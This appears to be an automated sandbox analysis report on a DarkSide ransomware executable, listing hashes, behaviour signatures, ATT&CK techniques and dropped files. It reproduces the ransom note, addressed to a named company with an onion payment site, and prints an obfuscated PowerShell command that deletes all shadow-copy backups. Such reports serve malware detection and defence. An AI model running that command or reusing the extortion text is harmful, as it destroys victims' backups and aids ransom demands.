Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    117s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 19:37

General

  • Target

    0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe

  • Size

    59KB

  • MD5

    885fc8fb590b899c1db7b42fe83dddc3

  • SHA1

    c104056f9a926d27a2082f0510c97b09cb0eb3e5

  • SHA256

    0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d

  • SHA512

    2b8e49ad84434dcaf98635120ac54bfa7e55bb61bf9d0e3f1f25ab81e950f638311d2121217bf5840834778d5e137551e24b89da02f12dc6be99d755c54f4c13

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1yl3XsY23W58:0x7Fu4/ihrhDTV1ylHXZ58

Malware Config

Extracted

Path

C:\Users\Admin\README.47246f95.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW When you open our website, put the following data in the input form: Key: 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (178) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe
    "C:\Users\Admin\AppData\Local\Temp\0839aabe5fd63b16844a27b3c586c02a044d119010a1a40ee4035501c34eae0d.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2760
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:592

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    6b96882569f8ac9bafaa6ab8fd229ad3

    SHA1

    be2fb76488a8447f28f68ac9fa76b5de5061c8bb

    SHA256

    1b59d3e03ff9de7de6a0ed0f56b9cdb7925d7f9a716c5cd9f9a03fbc83a2b5e3

    SHA512

    8ca46a7372f676ec6e8a2eecbc8d9bca00b620f74f3e79e77e56c71a9d5a2cf9f346e9af7751121f5186c60d05beb9dba5025dafbf4ee744d89ce06c7783ae3e

  • C:\Users\Admin\README.47246f95.TXT
    Filesize

    1KB

    MD5

    d4e176b40c4ea17f4870c34fad926d6e

    SHA1

    2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0

    SHA256

    7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c

    SHA512

    feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471

  • memory/2760-5-0x000000001B340000-0x000000001B622000-memory.dmp
    Filesize

    2.9MB

  • memory/2760-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp
    Filesize

    32KB

  • memory/2760-7-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp
    Filesize

    9.6MB

  • memory/2760-8-0x0000000002940000-0x00000000029C0000-memory.dmp
    Filesize

    512KB

  • memory/2760-9-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp
    Filesize

    9.6MB

  • memory/2760-10-0x0000000002940000-0x00000000029C0000-memory.dmp
    Filesize

    512KB

  • memory/2760-11-0x0000000002940000-0x00000000029C0000-memory.dmp
    Filesize

    512KB

  • memory/2760-12-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp
    Filesize

    9.6MB